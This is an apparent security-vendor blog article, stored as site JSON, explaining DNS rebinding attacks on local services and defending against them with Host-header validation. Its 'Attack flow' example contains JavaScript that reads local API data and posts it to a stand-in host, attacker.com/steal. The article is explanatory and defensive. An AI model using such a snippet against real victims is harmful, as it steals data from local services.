[{"data":1,"prerenderedAt":167},["ShallowReactive",2],{"blog-vulnerabilities/dns-rebinding":3},{"id":4,"title":5,"body":6,"category":147,"date":148,"dateModified":148,"description":149,"draft":150,"extension":151,"faq":152,"featured":150,"headerVariant":153,"image":152,"keywords":152,"meta":154,"navigation":155,"ogDescription":156,"ogTitle":152,"path":157,"readTime":158,"schemaOrg":159,"schemaType":160,"seo":161,"sitemap":162,"stem":163,"tags":164,"twitterCard":165,"__hash__":166},"blog/blog/vulnerabilities/dns-rebinding.md","DNS Rebinding Explained",{"type":7,"value":8,"toc":140},"minimark",[9,16,21,43,58,62,80,84,93,109,128],[10,11,12],"tldr",{},[13,14,15],"p",{},"DNS rebinding tricks browsers into thinking a malicious site and your local service are the same origin. The attacker's domain initially resolves to their server, then rebinds to localhost. This bypasses same-origin policy, letting attackers access local services. Protect by validating the Host header.",[17,18,20],"h2",{"id":19},"how-dns-rebinding-works","How DNS Rebinding Works",[22,23,24,28,31,34,37,40],"ol",{},[25,26,27],"li",{},"Attacker controls evil.com which resolves to 1.2.3.4 (their server)",[25,29,30],{},"Victim visits evil.com, browser loads JavaScript",[25,32,33],{},"Attacker changes DNS to resolve evil.com to 127.0.0.1",[25,35,36],{},"JavaScript makes request to evil.com (now 127.0.0.1)",[25,38,39],{},"Browser thinks it is same-origin, allows the request",[25,41,42],{},"Attacker's script can now access local services",[44,45,47],"code-block",{"label":46},"Attack flow",[48,49,54],"pre",{"className":50,"code":52,"language":53},[51],"language-text","// Initial: evil.com -> 1.2.3.4 (attacker's server)\n// Victim visits https://evil.com\n// Attacker's JavaScript loads...\n\n// After DNS rebind: evil.com -> 127.0.0.1\nfetch('http://evil.com:8080/api/secrets')\n  // Browser resolves evil.com to 127.0.0.1\n  // Reaches local development server!\n  // Same-origin policy doesn't block it\n  .then(r => r.json())\n  .then(data => {\n    // Exfiltrate data to attacker's server\n    fetch('https://attacker.com/steal', {\n      method: 'POST',\n      body: JSON.stringify(data)\n    });\n  });\n","text",[55,56,52],"code",{"__ignoreMap":57},"",[17,59,61],{"id":60},"who-is-vulnerable","Who Is Vulnerable",[63,64,65,68,71,74,77],"ul",{},[25,66,67],{},"Development servers (localhost:3000, etc.)",[25,69,70],{},"IoT devices and smart home hubs",[25,72,73],{},"Database admin tools",[25,75,76],{},"Docker management interfaces",[25,78,79],{},"Any service binding to all interfaces (0.0.0.0)",[17,81,83],{"id":82},"how-to-prevent-dns-rebinding","How to Prevent DNS Rebinding",[44,85,87],{"label":86},"Validate Host header",[48,88,91],{"className":89,"code":90,"language":53},[51],"app.use((req, res, next) => {\n  const allowedHosts = ['localhost', '127.0.0.1', 'myapp.local'];\n  const host = req.headers.host?.split(':')[0];\n\n  if (!allowedHosts.includes(host)) {\n    return res.status(403).send('Invalid host');\n  }\n  next();\n});\n",[55,92,90],{"__ignoreMap":57},[94,95,96,103],"faq-section",{},[97,98,100],"faq-item",{"question":99},"Does HTTPS prevent DNS rebinding?",[13,101,102],{},"Partially. The attacker cannot get a valid certificate for localhost, so HTTPS services are safer. But HTTP services (common in development) are fully vulnerable.",[97,104,106],{"question":105},"How does this relate to SSRF?",[13,107,108],{},"DNS rebinding is client-side (browser-based), while SSRF is server-side. DNS rebinding abuses the victim's browser to reach local services, SSRF abuses the server itself.",[110,111,112,118,123],"related-articles",{},[113,114],"related-card",{"description":115,"href":116,"title":117},"Server-side version","/blog/vulnerabilities/ssrf","SSRF Explained",[113,119],{"description":120,"href":121,"title":122},"Another DNS attack","/blog/vulnerabilities/subdomain-takeover","Subdomain Takeover",[113,124],{"description":125,"href":126,"title":127},"Cross-origin issues","/blog/vulnerabilities/cors-misconfiguration","CORS Misconfiguration",[129,130,133,137],"cta-box",{"href":131,"label":132},"/","Start Free Scan",[17,134,136],{"id":135},"secure-your-services","Secure Your Services",[13,138,139],{},"Our scanner identifies services vulnerable to DNS rebinding.",{"title":57,"searchDepth":141,"depth":141,"links":142},2,[143,144,145,146],{"id":19,"depth":141,"text":20},{"id":60,"depth":141,"text":61},{"id":82,"depth":141,"text":83},{"id":135,"depth":141,"text":136},"vulnerabilities","2026-01-15","DNS rebinding lets attackers bypass same-origin policy by switching DNS resolution mid-session. Learn how it works and how to protect your local services.",false,"md",null,"red",{"noindex":155},true,"Learn how DNS rebinding attacks work and how to defend against them.","/blog/vulnerabilities/dns-rebinding","6 min read","[object Object]","TechArticle",{"title":5,"description":149},{"loc":157},"blog/vulnerabilities/dns-rebinding",[],"summary_large_image","EWNBoSgX51lp6T9uBzOhJedQEXizhyHmAxTmzcsHXw4",1775843926845]